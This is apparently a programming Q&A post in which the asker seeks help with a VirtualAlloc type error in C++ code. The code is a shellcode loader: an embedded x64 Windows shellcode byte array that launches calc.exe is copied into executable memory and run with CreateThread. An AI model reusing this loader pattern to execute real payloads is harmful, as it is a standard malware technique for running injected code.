# argument of type "unsigned long long" is incompatible with parameter of type "DWORD *" while using virtual alloc

Tags: c++, shellcode

Currently I am trying to allocate a space of memory using VirtualAlloc(). When I pass my parameters vscode suggests the following error: "argument of type "unsigned long long" is incompatible with parameter of type "DWORD *""

I don't understand why this is the case when i build the project with gcc everything compiles fine. Some clarification may be useful.

```
int main()
{

    unsigned char buf[] = 
"\x90\x90\x90\x90\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x43\x3a\x5c"
"\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33"
"\x32\x5c\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    // Alloc memory
    LPVOID addressPointer = VirtualAlloc(NULL, sizeof(buf), 0x3000, 0x40);
    // Copy shellcode
    RtlMoveMemory(addressPointer, buf, sizeof(buf));
    // Create thread pointing to shellcode address
    CreateThread(NULL, 0, addressPointer, NULL, 0, 0);
    // Sleep for a second to wait for the thread

    return 0;
}
```

Comment: Which argument, exactly? `VirtualAlloc` doesn't take any `DWORD*` arguments..

Comment: Your call to `CreateThread` has bad arguments. The third parameter should be the (address of the) thread function (cannot be NULL) and the fourth the `LPVOID` parameter to pass: `CreateThread(NULL, 0, threadfunc, addressPointer, 0, 0);` (where `threadfunc` is defined as `DWORD WINAPI threadfunc(LPVOID lpThreadParameter);`).

Comment: sizeof() and, 0x3000, 0x40 return this error. I must be something wrong with my intellisense?

Comment: Its worth noting I receive the same error if I just use the Sleep() function. Asking for a dword instead of an int.

Comment: https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc virtual alloc does take two DWORD arguments